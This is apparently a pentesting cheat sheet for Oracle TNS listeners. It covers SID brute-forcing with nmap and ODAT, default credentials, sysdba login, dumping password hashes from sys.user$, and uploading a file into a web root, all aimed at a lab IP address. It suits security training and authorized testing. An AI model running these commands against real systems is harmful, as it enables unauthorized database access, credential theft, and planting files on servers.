Oracle TNS
Port: TCP/1521
The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk
The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory
Oracle 9 has a default password, CHANGE_ON_INSTALL, whereas Oracle 10 has no default password set
Oracle DBSNMP service also uses a default password, dbsnmp
Each database or service has a unique entry in the tnsnames.ora file
In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance
The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to.
There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others.
Tools
./odat.py -hIf not installed, see Pentesting Machine
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-bruteODAT - More information, user bruteforcing included
./odat.py all -s 10.129.204.235SQLplus - Log In
sqlplus <username>/<password>@<IP>/<SID>select table_name from all_tables;select * from user_role_privs;Database Enumeration
possible to try known credentials to use the System Databse Admin sysdba:
sqlplus scott/[email protected]/XE as sysdbaThen list current user privs:
select * from user_role_privs;From this point, we could retrieve the password hashes from the sys.user$ and try to crack them offline:
select name, password from sys.user$;Oracle RDBMS - File Upload
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txtcurl -X GET http://10.129.204.235/testing.txtLast updated